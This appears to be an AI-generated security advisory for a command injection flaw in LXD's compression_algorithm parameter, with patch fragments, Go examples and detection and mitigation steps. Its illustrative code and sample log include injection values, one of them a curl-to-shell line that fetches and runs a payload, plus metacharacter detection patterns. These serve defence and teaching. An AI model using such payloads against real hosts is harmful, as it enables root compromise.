CVE-2026-28384 Overview
CVE-2026-28384 is a critical command injection vulnerability in Canonical LXD that allows an authenticated but otherwise unprivileged API user to execute arbitrary commands as the LXD daemon, which runs as root on the LXD host. The flaw is improper validation of the compression_algorithm parameter accepted by the image and backup API endpoints: the value is used to build the command LXD executes for compression. Successful exploitation lets an attacker with low-privilege API access run commands with the full privileges of the daemon process.
Critical Impact
An authenticated attacker can achieve remote code execution on the LXD server by exploiting improper input sanitization in the compression algorithm parameter, potentially compromising the entire container infrastructure.
Affected Products
- Canonical LXD versions 4.12 through 6.6
- LXD snap versions prior to 5.0.6-e49d9f4 (channel 5.0/stable)
- LXD snap versions prior to 5.21.4-1374f39 (channel 5.21/stable)
- LXD snap versions prior to 6.7-1f11451 (channel 6.0/stable)
Discovery Timeline
- 2026-03-12 - CVE-2026-28384 published to NVD
- 2026-03-12 - Last updated in NVD database
Technical Details for CVE-2026-28384
Vulnerability Analysis
This vulnerability is classified as CWE-78 (OS Command Injection), a severe weakness that occurs when an application constructs OS commands using untrusted input without proper validation or sanitization. In the case of CVE-2026-28384, the LXD daemon fails to adequately validate the compression_algorithm parameter before using it in command execution contexts within the image and backup processing endpoints.
The vulnerability is accessible over the network and requires low attack complexity. While authentication is required, the privileges needed are minimal—an unprivileged authenticated user can exploit this flaw. The impact extends beyond the vulnerable component itself, potentially compromising the confidentiality, integrity, and availability of the host system and other containers managed by the LXD instance.
Root Cause
The root cause of CVE-2026-28384 is the absence of input validation for the compression_algorithm parameter in the LXD API handlers. The value supplied by the client was used, unvalidated, to construct the command LXD executes to compress image and backup tarballs, so whoever controls the parameter controls what the daemon runs. The fix introduces validation by importing and using the validate package from github.com/canonical/lxd/shared/validate to ensure the compression algorithm conforms to the expected values before the handler proceeds.
Attack Vector
An authenticated attacker with access to the LXD API can send crafted requests to the image or backup endpoints with a malicious compression_algorithm value. Because the LXD daemon runs as root to manage containers and system resources, successful command injection results in code execution with root privileges on the host. This allows an attacker to bypass the isolation between tenants' containers, read any container's data, pivot to other systems, or completely compromise the LXD host.
The attack can be performed remotely over the network against any LXD instance exposing its API, making this particularly dangerous in multi-tenant environments or deployments where containers are managed by multiple users with varying trust levels.
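As an added illustration of the bug class (this is example code written for this page, not LXD's code and not the patch), the block below models the vulnerable pattern beside a hardened one. The model assumes the request field is split into an executable and arguments and handed to exec-style execution without any check; the allowlist of compressor names, the single level-flag rule and every function name are assumptions for the example, and LXD's real validator in shared/validate may accept a different set of values.

```go
package main

import (
	"errors"
	"fmt"
	"regexp"
	"strings"
)

// CompressCommand is the executable and arguments the daemon would run.
type CompressCommand struct {
	Path string
	Args []string
}

// BuildCompressCommandUnsafe mirrors the vulnerable pattern (constructed
// example, not LXD's code): whatever the client sent becomes the command,
// so an attacker-chosen value selects which binary the daemon runs as root.
func BuildCompressCommandUnsafe(algorithm string) (CompressCommand, error) {
	fields := strings.Fields(algorithm)
	if len(fields) == 0 {
		return CompressCommand{}, errors.New("empty compression algorithm")
	}
	return CompressCommand{Path: fields[0], Args: fields[1:]}, nil
}

// allowedCompressors is an assumed allowlist for this example; the real
// fixed list lives in github.com/canonical/lxd/shared/validate and may differ.
var allowedCompressors = map[string]bool{
	"none": true, "gzip": true, "bzip2": true, "xz": true,
	"lzma": true, "zstd": true, "pigz": true,
}

// levelFlag accepts only a single compression-level flag such as "-9".
var levelFlag = regexp.MustCompile(`^-[1-9]$`)

// ValidateCompressionAlgorithm returns an error unless the value is exactly an
// allowlisted compressor name, optionally followed by one level flag.
func ValidateCompressionAlgorithm(algorithm string) error {
	fields := strings.Fields(algorithm)
	if len(fields) == 0 || len(fields) > 2 {
		return fmt.Errorf("invalid compression algorithm %q", algorithm)
	}
	if !allowedCompressors[fields[0]] {
		return fmt.Errorf("compression algorithm %q is not allowed", fields[0])
	}
	if len(fields) == 2 && !levelFlag.MatchString(fields[1]) {
		return fmt.Errorf("invalid compression option %q", fields[1])
	}
	return nil
}

// BuildCompressCommandSafe validates first, so only allowlisted compressor
// names (resolved from the daemon's PATH) can ever reach execution.
func BuildCompressCommandSafe(algorithm string) (CompressCommand, error) {
	if err := ValidateCompressionAlgorithm(algorithm); err != nil {
		return CompressCommand{}, err
	}
	fields := strings.Fields(algorithm)
	return CompressCommand{Path: fields[0], Args: fields[1:]}, nil
}

func main() {
	// Constructed attacker payload: an arbitrary binary path plus arguments.
	payload := "/usr/bin/touch /tmp/owned-by-lxd"
	for _, v := range []string{"gzip -9", payload} {
		u, _ := BuildCompressCommandUnsafe(v)
		fmt.Printf("unsafe %-35q -> runs %s %v\n", v, u.Path, u.Args)
		if s, err := BuildCompressCommandSafe(v); err != nil {
			fmt.Printf("safe   %-35q -> rejected: %v\n", v, err)
		} else {
			fmt.Printf("safe   %-35q -> runs %s %v\n", v, s.Path, s.Args)
		}
	}
}
```

Whether the raw value reaches exec directly (as modelled here) or is interpolated into a shell line, the fix is the same: never derive the executable from the request; accept only a fixed set of names and a tightly constrained option.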
// Security patch introducing validation in lxd/images.go
// Source: https://github.com/canonical/lxd/commit/043696a13171ace7dd4c2b32d34ce039ab629052
"github.com/canonical/lxd/shared/ioprogress"
"github.com/canonical/lxd/shared/logger"
"github.com/canonical/lxd/shared/osarch"
+ "github.com/canonical/lxd/shared/validate"
"github.com/canonical/lxd/shared/version"
)
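Review bot: this hunk only adds the `validate` import to lxd/images.go; none of the visible lines show the call that checks `compression_algorithm` before the value reaches the compression command, so the behavioural change cannot be reviewed from this fragment. Please include the hunk containing the new `validate.` call in the image handler, together with the error path that rejects the request, since an added import by itself changes nothing.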
// Security patch introducing validation in lxd/instance_backup.go
// Source: https://github.com/canonical/lxd/commit/043696a13171ace7dd4c2b32d34ce039ab629052
"github.com/canonical/lxd/shared"
"github.com/canonical/lxd/shared/api"
"github.com/canonical/lxd/shared/entity"
+ "github.com/canonical/lxd/shared/validate"
"github.com/canonical/lxd/shared/version"
)
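Review bot: the import of shared/validate is added to lxd/instance_backup.go, but the validation call site in the backup handler is not among the shown lines. Because the image and backup handlers consume the same `compression_algorithm` field, both call sites should use one validator from shared/validate rather than separate allowlists, so the accepted values cannot drift apart between the two endpoints; please show that call so this can be confirmed.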
Detection Methods for CVE-2026-28384
Indicators of Compromise
- Unusual API requests to /1.0/images or /1.0/instances/{name}/backups whose compression_algorithm value contains shell special characters (;, |, &, $, backticks) or is anything other than an expected compressor name (for example a filesystem path)
- Unexpected child processes spawned by the LXD daemon process
- Anomalous system commands executed with LXD daemon privileges
- Evidence of container escape or unauthorized access to host resources
Detection Strategies
- Implement API request logging and monitor for malformed or suspicious compression_algorithm values
- Configure SIEM rules to alert on command injection patterns in LXD API traffic
- Deploy runtime application self-protection (RASP) to detect and block command injection attempts
- Monitor LXD daemon process trees for unexpected shell command execution
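The request-logging strategy above, as an added example written for this page (not LXD tooling): it scans constructed line-delimited JSON request records for POSTs to the image and backup endpoints and flags compression_algorithm values that do not look like a bare compressor name. The log format, field names and flagging heuristic are all assumptions for the example; LXD's own debug log does not use this format, so a deployment would feed it whatever record its request logging or terminating proxy produces.

```go
package main

import (
	"bufio"
	"encoding/json"
	"fmt"
	"regexp"
	"strings"
)

// sampleLog is a constructed sample of API request records (one JSON object
// per line). The field names are assumptions for this example.
const sampleLog = `{"ts":"2026-03-13T09:01:02Z","client":"10.0.0.5","identity":"ci-runner","method":"POST","path":"/1.0/images","compression_algorithm":"gzip"}
{"ts":"2026-03-13T09:02:10Z","client":"10.0.0.5","identity":"ci-runner","method":"POST","path":"/1.0/images","compression_algorithm":"xz -9"}
{"ts":"2026-03-13T09:05:44Z","client":"10.0.0.77","identity":"tenant-b","method":"POST","path":"/1.0/instances/web1/backups","compression_algorithm":"gzip; curl http://198.51.100.9/x | sh"}
{"ts":"2026-03-13T09:06:01Z","client":"10.0.0.77","identity":"tenant-b","method":"POST","path":"/1.0/instances/web1/backups","compression_algorithm":"/tmp/.p/run"}
{"ts":"2026-03-13T09:07:30Z","client":"10.0.0.12","identity":"ops","method":"GET","path":"/1.0/instances","compression_algorithm":""}
`

type apiRequest struct {
	TS       string `json:"ts"`
	Client   string `json:"client"`
	Identity string `json:"identity"`
	Method   string `json:"method"`
	Path     string `json:"path"`
	Algo     string `json:"compression_algorithm"`
}

// Finding is one alert-worthy request with the reason it was flagged.
type Finding struct {
	Request apiRequest
	Reason  string
}

// wellFormed is the shape a legitimate value has: a bare compressor name with
// at most one short numeric flag. Anything else is worth a look.
var wellFormed = regexp.MustCompile(`^[a-z0-9]+( -[0-9]+)?$`)

// SuspiciousReason returns "" for values that look legitimate, otherwise a
// short reason ordered from most to least specific.
func SuspiciousReason(algo string) string {
	if algo == "" || wellFormed.MatchString(algo) {
		return ""
	}
	if strings.ContainsAny(algo, ";|&$`<>(){}\n") {
		return "shell metacharacters in compression_algorithm"
	}
	if strings.Contains(algo, "/") {
		return "path instead of compressor name in compression_algorithm"
	}
	return "compression_algorithm does not match expected form"
}

// targetsVulnerableEndpoint limits alerting to the requests the CVE concerns.
func targetsVulnerableEndpoint(r apiRequest) bool {
	return r.Method == "POST" &&
		(r.Path == "/1.0/images" || strings.HasSuffix(r.Path, "/backups"))
}

// ScanLog parses the line-delimited JSON log and returns the flagged requests.
func ScanLog(log string) ([]Finding, error) {
	var findings []Finding
	sc := bufio.NewScanner(strings.NewReader(log))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		if line == "" {
			continue
		}
		var r apiRequest
		if err := json.Unmarshal([]byte(line), &r); err != nil {
			return nil, fmt.Errorf("bad log line %q: %w", line, err)
		}
		if !targetsVulnerableEndpoint(r) {
			continue
		}
		if reason := SuspiciousReason(r.Algo); reason != "" {
			findings = append(findings, Finding{Request: r, Reason: reason})
		}
	}
	return findings, sc.Err()
}

func main() {
	findings, err := ScanLog(sampleLog)
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("%s client=%s identity=%s %s %s value=%q: %s\n",
			f.Request.TS, f.Request.Client, f.Request.Identity,
			f.Request.Method, f.Request.Path, f.Request.Algo, f.Reason)
	}
}
```

Because every LXD API request is authenticated, each finding carries a client identity (certificate or OIDC subject) that can be revoked directly with the trust or identity commands rather than just an IP address.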
Monitoring Recommendations
- Enable verbose logging for LXD API endpoints and review logs for injection attempts
- Implement monitoring of LXD API traffic for malicious payloads, keeping in mind that the API is served over TLS with client-certificate or OIDC authentication, so request bodies are only visible on the host itself or at a proxy that terminates TLS
- Set up file integrity monitoring on LXD binaries and configuration files
- Monitor for privilege escalation attempts from container contexts to the host
How to Mitigate CVE-2026-28384
Immediate Actions Required
- Update LXD to the patched build of the channel already in use: 5.0.6-e49d9f4 (5.0/stable), 5.21.4-1374f39 (5.21/stable), or 6.7-1f11451 (6.0/stable); LXD does not support downgrades, so do not move an existing deployment to a newer channel just to pick up the fix
- Review LXD access controls and remove unnecessary user permissions
- Audit recent API access logs for potential exploitation attempts
- Restrict network access to the LXD API to trusted sources only
Patch Information
Canonical has released security patches addressing this vulnerability across multiple LXD release channels. The fixes introduce proper validation of the compression_algorithm parameter using the validate package before the value is used in command execution contexts. Administrators should update to the following fixed versions:
- Channel 5.0/stable: Version 5.0.6-e49d9f4
- Channel 5.21/stable: Version 5.21.4-1374f39
- Channel 6.0/stable: Version 6.7-1f11451
Note that channel 4.0/stable (version 4.0.10) is not affected by this vulnerability. For detailed patch information, refer to the Ubuntu LXD Remote Code Execution Fixes announcement and the GitHub Security Advisory GHSA-4rmf-rcp8-2r9g.
Workarounds
- Limit LXD API access to only trusted administrators until patches can be applied
- Implement network segmentation to isolate LXD management interfaces
- Use a web application firewall (WAF) or API gateway to filter potentially malicious input patterns, noting that such a proxy must terminate TLS to inspect requests and therefore cannot pass LXD's client-certificate authentication through to the daemon unchanged
- Disable remote API access if not required and manage LXD locally only
# Verify the installed LXD version and the channel the snap tracks
snap info lxd | grep -E 'installed|tracking'
# Update LXD to the patched build on the channel already in use (LXD cannot be downgraded, so do not switch channels just to pick up the fix)
sudo snap refresh lxd
# Or refresh while naming the current channel explicitly, for example:
sudo snap refresh lxd --channel=6.0/stable
# Confirm the running daemon reports the fixed version
lxc version
# Restrict LXD remote access if the network API is not needed (local unix socket only)
lxc config unset core.https_address
# Review which client certificates are trusted to use the API
lxc config trust list
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

